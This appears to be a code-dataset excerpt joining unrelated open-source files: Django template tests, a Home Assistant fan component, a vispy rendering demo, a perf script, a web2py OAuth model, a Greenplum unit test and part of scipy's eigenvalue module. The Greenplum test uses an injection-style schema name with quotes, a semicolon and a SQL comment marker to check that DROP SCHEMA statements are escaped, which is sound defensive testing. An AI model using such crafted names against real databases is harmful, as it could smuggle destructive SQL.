| agpl-3.0 |
katrid/django | tests/template_tests/test_context.py | 166 | 5389 | # -*- coding: utf-8 -*-
from django.http import HttpRequest
from django.template import (
Context, Engine, RequestContext, Template, Variable, VariableDoesNotExist,
)
from django.template.context import RenderContext
from django.test import RequestFactory, SimpleTestCase
class ContextTests(SimpleTestCase):
def test_context(self):
c = Context({"a": 1, "b": "xyzzy"})
self.assertEqual(c["a"], 1)
self.assertEqual(c.push(), {})
c["a"] = 2
self.assertEqual(c["a"], 2)
self.assertEqual(c.get("a"), 2)
self.assertEqual(c.pop(), {"a": 2})
self.assertEqual(c["a"], 1)
self.assertEqual(c.get("foo", 42), 42)
def test_push_context_manager(self):
c = Context({"a": 1})
with c.push():
c['a'] = 2
self.assertEqual(c['a'], 2)
self.assertEqual(c['a'], 1)
with c.push(a=3):
self.assertEqual(c['a'], 3)
self.assertEqual(c['a'], 1)
def test_update_context_manager(self):
c = Context({"a": 1})
with c.update({}):
c['a'] = 2
self.assertEqual(c['a'], 2)
self.assertEqual(c['a'], 1)
with c.update({'a': 3}):
self.assertEqual(c['a'], 3)
self.assertEqual(c['a'], 1)
def test_setdefault(self):
c = Context()
x = c.setdefault('x', 42)
self.assertEqual(x, 42)
self.assertEqual(c['x'], 42)
x = c.setdefault('x', 100)
self.assertEqual(x, 42)
self.assertEqual(c['x'], 42)
def test_resolve_on_context_method(self):
"""
#17778 -- Variable shouldn't resolve RequestContext methods
"""
empty_context = Context()
with self.assertRaises(VariableDoesNotExist):
Variable('no_such_variable').resolve(empty_context)
with self.assertRaises(VariableDoesNotExist):
Variable('new').resolve(empty_context)
self.assertEqual(
Variable('new').resolve(Context({'new': 'foo'})),
'foo',
)
def test_render_context(self):
test_context = RenderContext({'fruit': 'papaya'})
# Test that push() limits access to the topmost dict
test_context.push()
test_context['vegetable'] = 'artichoke'
self.assertEqual(list(test_context), ['vegetable'])
self.assertNotIn('fruit', test_context)
with self.assertRaises(KeyError):
test_context['fruit']
self.assertIsNone(test_context.get('fruit'))
def test_flatten_context(self):
a = Context()
a.update({'a': 2})
a.update({'b': 4})
a.update({'c': 8})
self.assertEqual(a.flatten(), {
'False': False, 'None': None, 'True': True,
'a': 2, 'b': 4, 'c': 8
})
def test_context_comparable(self):
"""
#21765 -- equality comparison should work
"""
test_data = {'x': 'y', 'v': 'z', 'd': {'o': object, 'a': 'b'}}
self.assertEqual(Context(test_data), Context(test_data))
a = Context()
b = Context()
self.assertEqual(a, b)
# update only a
a.update({'a': 1})
self.assertNotEqual(a, b)
# update both to check regression
a.update({'c': 3})
b.update({'c': 3})
self.assertNotEqual(a, b)
        # make contexts equal again
b.update({'a': 1})
self.assertEqual(a, b)
def test_copy_request_context_twice(self):
"""
#24273 -- Copy twice shouldn't raise an exception
"""
RequestContext(HttpRequest()).new().new()
class RequestContextTests(SimpleTestCase):
def test_include_only(self):
"""
#15721 -- ``{% include %}`` and ``RequestContext`` should work
together.
"""
engine = Engine(loaders=[
('django.template.loaders.locmem.Loader', {
'child': '{{ var|default:"none" }}',
}),
])
request = RequestFactory().get('/')
ctx = RequestContext(request, {'var': 'parent'})
self.assertEqual(engine.from_string('{% include "child" %}').render(ctx), 'parent')
self.assertEqual(engine.from_string('{% include "child" only %}').render(ctx), 'none')
def test_stack_size(self):
"""
        #7116 -- Optimize RequestContext construction
"""
request = RequestFactory().get('/')
ctx = RequestContext(request, {})
        # The stack should now contain 4 items:
        # [builtins, supplied context, context processor, empty dict]
self.assertEqual(len(ctx.dicts), 4)
def test_context_comparable(self):
# Create an engine without any context processors.
test_data = {'x': 'y', 'v': 'z', 'd': {'o': object, 'a': 'b'}}
# test comparing RequestContext to prevent problems if somebody
# adds __eq__ in the future
request = RequestFactory().get('/')
self.assertEqual(
RequestContext(request, dict_=test_data),
RequestContext(request, dict_=test_data),
)
def test_modify_context_and_render(self):
template = Template('{{ foo }}')
request = RequestFactory().get('/')
context = RequestContext(request, {})
context['foo'] = 'foo'
self.assertEqual(template.render(context), 'foo')
| bsd-3-clause |
fbradyirl/home-assistant | homeassistant/components/esphome/fan.py | 2 | 3689 | """Support for ESPHome fans."""
import logging
from typing import List, Optional
from aioesphomeapi import FanInfo, FanSpeed, FanState
from homeassistant.components.fan import (
SPEED_HIGH,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_OFF,
SUPPORT_OSCILLATE,
SUPPORT_SET_SPEED,
FanEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers.typing import HomeAssistantType
from . import (
EsphomeEntity,
esphome_map_enum,
esphome_state_property,
platform_async_setup_entry,
)
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistantType, entry: ConfigEntry, async_add_entities
) -> None:
"""Set up ESPHome fans based on a config entry."""
await platform_async_setup_entry(
hass,
entry,
async_add_entities,
component_key="fan",
info_type=FanInfo,
entity_type=EsphomeFan,
state_type=FanState,
)
@esphome_map_enum
def _fan_speeds():
return {
FanSpeed.LOW: SPEED_LOW,
FanSpeed.MEDIUM: SPEED_MEDIUM,
FanSpeed.HIGH: SPEED_HIGH,
}
class EsphomeFan(EsphomeEntity, FanEntity):
"""A fan implementation for ESPHome."""
@property
def _static_info(self) -> FanInfo:
return super()._static_info
@property
def _state(self) -> Optional[FanState]:
return super()._state
async def async_set_speed(self, speed: str) -> None:
"""Set the speed of the fan."""
if speed == SPEED_OFF:
await self.async_turn_off()
return
await self._client.fan_command(
self._static_info.key, speed=_fan_speeds.from_hass(speed)
)
async def async_turn_on(self, speed: Optional[str] = None, **kwargs) -> None:
"""Turn on the fan."""
if speed == SPEED_OFF:
await self.async_turn_off()
return
data = {"key": self._static_info.key, "state": True}
if speed is not None:
data["speed"] = _fan_speeds.from_hass(speed)
await self._client.fan_command(**data)
# pylint: disable=arguments-differ
async def async_turn_off(self, **kwargs) -> None:
"""Turn off the fan."""
await self._client.fan_command(key=self._static_info.key, state=False)
async def async_oscillate(self, oscillating: bool) -> None:
"""Oscillate the fan."""
await self._client.fan_command(
key=self._static_info.key, oscillating=oscillating
)
@esphome_state_property
def is_on(self) -> Optional[bool]:
"""Return true if the entity is on."""
return self._state.state
@esphome_state_property
def speed(self) -> Optional[str]:
"""Return the current speed."""
if not self._static_info.supports_speed:
return None
return _fan_speeds.from_esphome(self._state.speed)
@esphome_state_property
    def oscillating(self) -> Optional[bool]:
"""Return the oscillation state."""
if not self._static_info.supports_oscillation:
return None
return self._state.oscillating
@property
def speed_list(self) -> Optional[List[str]]:
"""Get the list of available speeds."""
if not self._static_info.supports_speed:
return None
return [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
@property
def supported_features(self) -> int:
"""Flag supported features."""
flags = 0
if self._static_info.supports_oscillation:
flags |= SUPPORT_OSCILLATE
if self._static_info.supports_speed:
flags |= SUPPORT_SET_SPEED
return flags
| apache-2.0 |
inclement/vispy | examples/demo/gloo/offscreen.py | 18 | 4206 | # -*- coding: utf-8 -*-
# vispy: testskip
# -----------------------------------------------------------------------------
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
"""
Demonstrate how to do offscreen rendering.
Possible use cases:
* GPGPU without CUDA or OpenCL
* creation of scripted animations
* remote and Web backends
The method consists of:
1. Not showing the canvas (show=False).
2. Rendering to an FBO.
3. Manually triggering a rendering pass with self.update().
4. Retrieving the scene with _screenshot().
5. Closing the app after the first rendering pass (if that's the intended
scenario).
"""
from vispy import gloo
from vispy import app
from vispy.util.ptime import time
from vispy.gloo.util import _screenshot
# WARNING: doesn't work with Qt4 (update() does not call on_draw()??)
app.use_app('glfw')
vertex = """
attribute vec2 position;
void main()
{
gl_Position = vec4(position, 0, 1.0);
}
"""
fragment = """
uniform vec2 resolution;
uniform vec2 center;
uniform float scale;
uniform int iter;
// Jet color scheme
vec4 color_scheme(float x) {
vec3 a, b;
float c;
if (x < 0.34) {
a = vec3(0, 0, 0.5);
b = vec3(0, 0.8, 0.95);
c = (x - 0.0) / (0.34 - 0.0);
} else if (x < 0.64) {
a = vec3(0, 0.8, 0.95);
b = vec3(0.85, 1, 0.04);
c = (x - 0.34) / (0.64 - 0.34);
} else if (x < 0.89) {
a = vec3(0.85, 1, 0.04);
b = vec3(0.96, 0.7, 0);
c = (x - 0.64) / (0.89 - 0.64);
} else {
a = vec3(0.96, 0.7, 0);
b = vec3(0.5, 0, 0);
c = (x - 0.89) / (1.0 - 0.89);
}
return vec4(mix(a, b, c), 1.0);
}
void main() {
vec2 z, c;
// Recover coordinates from pixel coordinates
c.x = (gl_FragCoord.x / resolution.x - 0.5) * scale + center.x;
c.y = (gl_FragCoord.y / resolution.y - 0.5) * scale + center.y;
// Main Mandelbrot computation
int i;
z = c;
for(i = 0; i < iter; i++) {
float x = (z.x * z.x - z.y * z.y) + c.x;
float y = (z.y * z.x + z.x * z.y) + c.y;
if((x * x + y * y) > 4.0) break;
z.x = x;
z.y = y;
}
// Convert iterations to color
float color = 1.0 - float(i) / float(iter);
gl_FragColor = color_scheme(color);
}
"""
class Canvas(app.Canvas):
def __init__(self, size=(600, 600)):
# We hide the canvas upon creation.
app.Canvas.__init__(self, show=False, size=size)
self._t0 = time()
# Texture where we render the scene.
self._rendertex = gloo.Texture2D(shape=self.size + (4,))
# FBO.
self._fbo = gloo.FrameBuffer(self._rendertex,
gloo.RenderBuffer(self.size))
# Regular program that will be rendered to the FBO.
self.program = gloo.Program(vertex, fragment)
self.program["position"] = [(-1, -1), (-1, 1), (1, 1),
(-1, -1), (1, 1), (1, -1)]
self.program["scale"] = 3
self.program["center"] = [-0.5, 0]
self.program["iter"] = 300
self.program['resolution'] = self.size
# We manually draw the hidden canvas.
self.update()
def on_draw(self, event):
# Render in the FBO.
with self._fbo:
gloo.clear('black')
gloo.set_viewport(0, 0, *self.size)
self.program.draw()
# Retrieve the contents of the FBO texture.
self.im = _screenshot((0, 0, self.size[0], self.size[1]))
self._time = time() - self._t0
# Immediately exit the application.
app.quit()
if __name__ == '__main__':
c = Canvas()
size = c.size
app.run()
# The rendering is done, we get the rendering output (4D NumPy array)
render = c.im
print('Finished in %.1fms.' % (c._time*1e3))
# Now, we display this image with matplotlib to check.
import matplotlib.pyplot as plt
plt.figure(figsize=(size[0]/100., size[1]/100.), dpi=100)
plt.imshow(render, interpolation='none')
plt.show()
| bsd-3-clause |
DutchDanny/SensationXL-ICS | tools/perf/scripts/python/syscall-counts-by-pid.py | 11180 | 1927 | # system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts-by-pid.py [comm]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
try:
syscalls[common_comm][common_pid][id] += 1
except TypeError:
syscalls[common_comm][common_pid][id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events by comm/pid:\n\n",
print "%-40s %10s\n" % ("comm [pid]/syscalls", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id, val in sorted(syscalls[comm][pid].iteritems(), \
key = lambda(k, v): (v, k), reverse = True):
print " %-38s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
INBio/ala-install | ansible/roles/web2pyApps/files/db.py | 5 | 11481 | # -*- coding: utf-8 -*-
from pprint import pprint
import sys
import os
from ConfigParser import SafeConfigParser
import urllib2
import json
conf = SafeConfigParser({})
try:
if os.path.isfile("applications/%s/private/localconfig" % request.application):
conf.read("applications/%s/private/localconfig" % request.application)
else:
conf.read("applications/%s/private/config" % request.application)
except:
pass #@TEMP probably should log this event...
# add our GitHub client secret from a separate file (kept out of source repo)
if os.path.isfile("applications/%s/private/GITHUB_CLIENT_SECRET" % request.application):
GITHUB_CLIENT_SECRET = open("applications/%s/private/GITHUB_CLIENT_SECRET" % request.application).read().strip()
conf.set("apis", "github_client_secret", GITHUB_CLIENT_SECRET)
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()
#if not request.env.web2py_runtime_gae:
## if NOT running on Google App Engine use SQLite or other DB
db = DAL('sqlite://storage.sqlite',folder='applications/curator/databases',pool_size=1,check_reserved=['all'])
#else:
## connect to Google BigTable (optional 'google:datastore://namespace')
#db = DAL('google:datastore')
## store sessions and tickets there
#session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db)
crud, service, plugins = Crud(db), Service(), PluginManager()
#
# Simple storage for study supporting files. These are stored temporarily,
# pending deposition in Dryad or another permanent repository.
#
# I'm adapting a recipe for using web2py with the jQuery-File-Upload plugin:
# http://in10min.blogspot.com/2013/04/web2py-implement-multiple-files-upload.html
#
SupportingFiles = db.define_table('supporting_files',
Field('doc', 'upload', autodelete=True),
#Field('thumb', 'upload', autodelete=True),
#Field('sizeFile', 'float'),
#Field('sessionId', 'string'),)
Field('file_size', 'float'),
Field('study_id', 'string'),)
#from smarthumb import SMARTHUMB
#box = (200, 200)
#SupportingFiles.thumb.compute = lambda row: SMARTHUMB(row.doc, box)
#
# OAuth2 for Github (API v3), based on the FB sample provided in gluon/contrib/login_methods/oauth20_account.py
#
# You need to override the get_user method to match your auth provider needs.
# define the auth_table before calling auth.define_tables()
auth_table = db.define_table(
auth.settings.table_user_name,
Field('name', length=256, default=""), # "Charles Darwin"
Field('email', length=128, default=""), # "[email protected]"
Field('github_login', length=128, default=""), # "chuckd" [Github calls this 'login']
Field('github_url', length=256, default=""), # "https://github.com/chuckd" [Github calls this 'html_url']
Field('avatar_url', length=256, default=""), # "http://0.gravatar.com/avatar/805...9689b.png"
#Field('password', 'password', length=256, readable=False, label='Password'),
Field('github_auth_token', length=128, default= "", writable=False, readable=False),
## Some fields are expected by web2py, so repeat some values above..?
Field('first_name', length=128, default=""),
Field('last_name', length=128, default=""),
Field('username', length=128, default="", ), # unique=True not allowed in sqlite3
Field('password', 'password', length=256, readable=False, label='Password'),
Field('registration_key', length=128, default= "", writable=False, readable=False),
)
# is there another 'auth_token' field here already?
auth_table.github_login.requires = IS_NOT_IN_DB(db, auth_table.github_login)
auth.define_tables()
# OR auth.define_tables(username=False, signature=False)
# see https://code.google.com/p/web2py/issues/detail?id=1260
# Looking for your app's client ID and secret in {app}/private/config
try:
CLIENT_ID = conf.get("apis", "github_client_id")
CLIENT_SECRET = conf.get("apis", "github_client_secret")
REDIRECT_URI = conf.get("apis", "github_redirect_uri")
except:
CLIENT_ID = "CLIENT_ID_NOT_FOUND"
CLIENT_SECRET = "CLIENT_SECRET_NOT_FOUND"
REDIRECT_URI = "REDIRECT_URI_NOT_FOUND"
AUTH_URL="http://..."
TOKEN_URL="http://..."
from gluon import current
from gluon.contrib.login_methods.oauth20_account import OAuthAccount
class GitHubAccount(OAuthAccount):
'''OAuth impl for GitHub'''
# http://developer.github.com/v3/oauth/
AUTH_URL="https://github.com/login/oauth/authorize"
TOKEN_URL="https://github.com/login/oauth/access_token"
def __init__(self):
OAuthAccount.__init__(self,
g=globals(),
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
auth_url=self.AUTH_URL,
token_url=self.TOKEN_URL,
redirect_uri=REDIRECT_URI,
state=os.urandom(16).encode('hex'),
# random string to detect cross-site request forgery
scope='public_repo') # add ',repo' if including private repos
# adding session here, since older OAuthAccount doesn't seem to have it.. :-/
self.session = globals()['session']
def get_user(self):
'''Returns the user using the GitHub User API.'''
##sys.stderr.write('get_user STARTING...\n')
access_token = self.accessToken()
if not access_token:
##sys.stderr.write('get_user NO TOKEN FOUND\n')
return None
##sys.stderr.write('get_user FOUND access_token:\n')
##pprint(access_token)
##sys.stderr.write('> get_user, finishing with this CURRENT.session.token:\n')
##pprint(current.session.token)
##sys.stderr.write('> get_user, trying SELF.session.token:\n')
##pprint(self.session.token)
##sys.stderr.write('> what about just session.token?\n')
##pprint(session.token)
# fetch full user info from GitHub, to add/update user data
user_request = urllib2.Request("https://api.github.com/user", headers={"Authorization" : ("token %s" % access_token)})
data = urllib2.urlopen(user_request).read()
user_json = {}
try:
user_json = json.loads(data)
except Exception, e:
raise Exception("Cannot parse oauth server response %s %s" % (data, e))
return None
##pprint('----------- user_json ----------')
##pprint(user_json)
##pprint('----------- auth_user_fields ----------')
# remap to our chosen auth_user fields
auth_user_fields = dict(name = user_json.get('name', user_json['login']),
email = user_json.get('email', 'EMAIL_NOT_PROVIDED'),
github_login = user_json['login'],
registration_id = user_json['login'],
# required? see https://groups.google.com/forum/#!topic/web2py/yd4_yExPwXg/discussion
github_url = user_json['html_url'],
avatar_url = user_json['avatar_url'],
github_auth_token = access_token,
# adding more (apparently) standard web2py fields, to make this work..
first_name = user_json['login'],
last_name = ("(%s)" % user_json.get('name', user_json['login'])),
username = user_json['login'],
#password = 'TOP-SECRET',
registration_key = user_json['login'],
)
##pprint(auth_user_fields)
##pprint('--------------------------------')
return dict(auth_user_fields)
# use the class above to build a new login form
auth.settings.login_form=GitHubAccount()
# specify which auth_user fields can be modified on SECOND and subsequent logins
auth.settings.update_fields = ['name',
'email',
'github_login',
#'registration_id',
'github_url',
'avatar_url',
'github_auth_token',
'first_name',
'last_name',
'username',
#'password',
'registration_key']
# there's no point in offering other user-management actions (we just shadow users in GitHub)
auth.settings.actions_disabled=['register', 'change_password','request_reset_password','profile']
## configure email
mail = auth.settings.mailer
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = '[email protected]'
mail.settings.login = 'username:password'
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
#########################################################################
## Define your tables below (or better in another model file) for example
##
## >>> db.define_table('mytable',Field('myfield','string'))
##
## Fields can be 'string','text','password','integer','double','boolean'
## 'date','time','datetime','blob','upload', 'reference TABLENAME'
## There is an implicit 'id integer autoincrement' field
## Consult manual for more options, validators, etc.
##
## More API examples for controllers:
##
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
| apache-2.0 |
ahachete/gpdb | gpMgmt/bin/gppylib/test/unit/test_unit_leaked_schema_dropper.py | 39 | 2184 | from mock import *
from gp_unittest import *
from gpcheckcat_modules.leaked_schema_dropper import LeakedSchemaDropper
class LeakedSchemaDropperTestCase(GpTestCase):
def setUp(self):
self.db_connection = Mock(spec=['query'])
two_leaked_schemas = Mock()
two_leaked_schemas.getresult.return_value = [
('fake_leak_1', 'something_else'),
('some"test"special_#;character--schema', 'something_else')
]
self.db_connection.query.return_value = two_leaked_schemas
self.subject = LeakedSchemaDropper()
def test_drop_leaked_schemas__returns_a_list_of_leaked_schemas(self):
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), ['fake_leak_1', 'some"test"special_#;character--schema'])
def test_drop_leaked_schemas__when_there_are_no_leaked_schemas__returns_an_empty_list(self):
no_leaked_schemas = Mock()
no_leaked_schemas.getresult.return_value = []
self.db_connection.query.return_value = no_leaked_schemas
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), [])
def test_drop_leaked_schemas__when_query_returns_null_schema__returns_an_empty_list(self):
null_leaked_schema = Mock()
null_leaked_schema.getresult.return_value = [(None, 'something_else')]
self.db_connection.query.return_value = null_leaked_schema
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), [])
def test_drop_leaked_schemas__when_query_returns_null__returns_an_empty_list(self):
self.db_connection.query.return_value = None
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), [])
def test_drop_leaked_schemas__drops_orphaned_and_leaked_schemas(self):
self.subject.drop_leaked_schemas(self.db_connection)
drop_query_expected_list = [call("DROP SCHEMA IF EXISTS \"fake_leak_1\" CASCADE;"),
call("DROP SCHEMA IF EXISTS \"some\"\"test\"\"special_#;character--schema\" CASCADE;")]
self.db_connection.query.assert_has_calls(drop_query_expected_list)
if __name__ == '__main__':
run_tests()
| apache-2.0 |
ryfeus/lambda-packs | LightGBM_sklearn_scipy_numpy/source/scipy/linalg/decomp.py | 9 | 43423 | #
# Author: Pearu Peterson, March 2002
#
# additions by Travis Oliphant, March 2002
# additions by Eric Jones, June 2002
# additions by Johannes Loehnert, June 2006
# additions by Bart Vandereycken, June 2006
# additions by Andrew D Straw, May 2007
# additions by Tiziano Zito, November 2008
#
# April 2010: Functions for LU, QR, SVD, Schur and Cholesky decompositions were
# moved to their own files. Still in this file are functions for eigenstuff
# and for the Hessenberg form.
from __future__ import division, print_function, absolute_import
__all__ = ['eig', 'eigvals', 'eigh', 'eigvalsh',
'eig_banded', 'eigvals_banded',
'eigh_tridiagonal', 'eigvalsh_tridiagonal', 'hessenberg']
import numpy
from numpy import (array, isfinite, inexact, nonzero, iscomplexobj, cast,
flatnonzero, conj, asarray, argsort, empty)
# Local imports
from scipy._lib.six import xrange
from scipy._lib._util import _asarray_validated
from scipy._lib.six import string_types
from .misc import LinAlgError, _datacopied, norm
from .lapack import get_lapack_funcs, _compute_lwork
_I = cast['F'](1j)
def _make_complex_eigvecs(w, vin, dtype):
"""
Produce complex-valued eigenvectors from LAPACK DGGEV real-valued output
"""
# - see LAPACK man page DGGEV at ALPHAI
v = numpy.array(vin, dtype=dtype)
m = (w.imag > 0)
m[:-1] |= (w.imag[1:] < 0) # workaround for LAPACK bug, cf. ticket #709
for i in flatnonzero(m):
v.imag[:, i] = vin[:, i+1]
conj(v[:, i], v[:, i+1])
return v
def _make_eigvals(alpha, beta, homogeneous_eigvals):
if homogeneous_eigvals:
if beta is None:
return numpy.vstack((alpha, numpy.ones_like(alpha)))
else:
return numpy.vstack((alpha, beta))
else:
if beta is None:
return alpha
else:
w = numpy.empty_like(alpha)
alpha_zero = (alpha == 0)
beta_zero = (beta == 0)
beta_nonzero = ~beta_zero
w[beta_nonzero] = alpha[beta_nonzero]/beta[beta_nonzero]
# Use numpy.inf for complex values too since
# 1/numpy.inf = 0, i.e. it correctly behaves as projective
# infinity.
w[~alpha_zero & beta_zero] = numpy.inf
if numpy.all(alpha.imag == 0):
w[alpha_zero & beta_zero] = numpy.nan
else:
w[alpha_zero & beta_zero] = complex(numpy.nan, numpy.nan)
return w
def _geneig(a1, b1, left, right, overwrite_a, overwrite_b,
homogeneous_eigvals):
ggev, = get_lapack_funcs(('ggev',), (a1, b1))
cvl, cvr = left, right
res = ggev(a1, b1, lwork=-1)
lwork = res[-2][0].real.astype(numpy.int)
if ggev.typecode in 'cz':
alpha, beta, vl, vr, work, info = ggev(a1, b1, cvl, cvr, lwork,
overwrite_a, overwrite_b)
w = _make_eigvals(alpha, beta, homogeneous_eigvals)
else:
alphar, alphai, beta, vl, vr, work, info = ggev(a1, b1, cvl, cvr,
lwork, overwrite_a,
overwrite_b)
alpha = alphar + _I * alphai
w = _make_eigvals(alpha, beta, homogeneous_eigvals)
_check_info(info, 'generalized eig algorithm (ggev)')
only_real = numpy.all(w.imag == 0.0)
if not (ggev.typecode in 'cz' or only_real):
t = w.dtype.char
if left:
vl = _make_complex_eigvecs(w, vl, t)
if right:
vr = _make_complex_eigvecs(w, vr, t)
# the eigenvectors returned by the lapack function are NOT normalized
for i in xrange(vr.shape[0]):
if right:
vr[:, i] /= norm(vr[:, i])
if left:
vl[:, i] /= norm(vl[:, i])
if not (left or right):
return w
if left:
if right:
return w, vl, vr
return w, vl
return w, vr
def eig(a, b=None, left=False, right=True, overwrite_a=False,
overwrite_b=False, check_finite=True, homogeneous_eigvals=False):
"""
Solve an ordinary or generalized eigenvalue problem of a square matrix.
Find eigenvalues w and right or left eigenvectors of a general matrix::
a vr[:,i] = w[i] b vr[:,i]
a.H vl[:,i] = w[i].conj() b.H vl[:,i]
where ``.H`` is the Hermitian conjugation.
Parameters
----------
a : (M, M) array_like
A complex or real matrix whose eigenvalues and eigenvectors
will be computed.
b : (M, M) array_like, optional
Right-hand side matrix in a generalized eigenvalue problem.
Default is None, identity matrix is assumed.
left : bool, optional
Whether to calculate and return left eigenvectors. Default is False.
right : bool, optional
Whether to calculate and return right eigenvectors. Default is True.
overwrite_a : bool, optional
Whether to overwrite `a`; may improve performance. Default is False.
overwrite_b : bool, optional
Whether to overwrite `b`; may improve performance. Default is False.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
homogeneous_eigvals : bool, optional
If True, return the eigenvalues in homogeneous coordinates.
In this case ``w`` is a (2, M) array so that::
w[1,i] a vr[:,i] = w[0,i] b vr[:,i]
Default is False.
Returns
-------
w : (M,) or (2, M) double or complex ndarray
The eigenvalues, each repeated according to its
multiplicity. The shape is (M,) unless
``homogeneous_eigvals=True``.
vl : (M, M) double or complex ndarray
The normalized left eigenvector corresponding to the eigenvalue
``w[i]`` is the column vl[:,i]. Only returned if ``left=True``.
vr : (M, M) double or complex ndarray
The normalized right eigenvector corresponding to the eigenvalue
``w[i]`` is the column ``vr[:,i]``. Only returned if ``right=True``.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eigvals : eigenvalues of general arrays
eigh : Eigenvalues and right eigenvectors for symmetric/Hermitian arrays.
eig_banded : eigenvalues and right eigenvectors for symmetric/Hermitian
band matrices
    eigh_tridiagonal : eigenvalues and right eigenvectors for
symmetric/Hermitian tridiagonal matrices
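    Examples
    --------
    A minimal illustrative sketch (a 2x2 rotation generator whose eigenvalues
    are the purely imaginary pair ``1j`` and ``-1j``):
    >>> import numpy as np
    >>> from scipy.linalg import eig
    >>> a = np.array([[0., -1.], [1., 0.]])
    >>> w, vr = eig(a)
    >>> np.allclose(a.dot(vr), vr * w)
    True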
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or (_datacopied(a1, a))
if b is not None:
b1 = _asarray_validated(b, check_finite=check_finite)
overwrite_b = overwrite_b or _datacopied(b1, b)
if len(b1.shape) != 2 or b1.shape[0] != b1.shape[1]:
raise ValueError('expected square matrix')
if b1.shape != a1.shape:
raise ValueError('a and b must have the same shape')
return _geneig(a1, b1, left, right, overwrite_a, overwrite_b,
homogeneous_eigvals)
geev, geev_lwork = get_lapack_funcs(('geev', 'geev_lwork'), (a1,))
compute_vl, compute_vr = left, right
lwork = _compute_lwork(geev_lwork, a1.shape[0],
compute_vl=compute_vl,
compute_vr=compute_vr)
if geev.typecode in 'cz':
w, vl, vr, info = geev(a1, lwork=lwork,
compute_vl=compute_vl,
compute_vr=compute_vr,
overwrite_a=overwrite_a)
w = _make_eigvals(w, None, homogeneous_eigvals)
else:
wr, wi, vl, vr, info = geev(a1, lwork=lwork,
compute_vl=compute_vl,
compute_vr=compute_vr,
overwrite_a=overwrite_a)
t = {'f': 'F', 'd': 'D'}[wr.dtype.char]
w = wr + _I * wi
w = _make_eigvals(w, None, homogeneous_eigvals)
_check_info(info, 'eig algorithm (geev)',
positive='did not converge (only eigenvalues '
'with order >= %d have converged)')
only_real = numpy.all(w.imag == 0.0)
if not (geev.typecode in 'cz' or only_real):
t = w.dtype.char
if left:
vl = _make_complex_eigvecs(w, vl, t)
if right:
vr = _make_complex_eigvecs(w, vr, t)
if not (left or right):
return w
if left:
if right:
return w, vl, vr
return w, vl
return w, vr
def eigh(a, b=None, lower=True, eigvals_only=False, overwrite_a=False,
overwrite_b=False, turbo=True, eigvals=None, type=1,
check_finite=True):
"""
Solve an ordinary or generalized eigenvalue problem for a complex
Hermitian or real symmetric matrix.
Find eigenvalues w and optionally eigenvectors v of matrix `a`, where
`b` is positive definite::
a v[:,i] = w[i] b v[:,i]
v[i,:].conj() a v[:,i] = w[i]
v[i,:].conj() b v[:,i] = 1
Parameters
----------
a : (M, M) array_like
A complex Hermitian or real symmetric matrix whose eigenvalues and
eigenvectors will be computed.
b : (M, M) array_like, optional
        A complex Hermitian or real symmetric positive definite matrix.
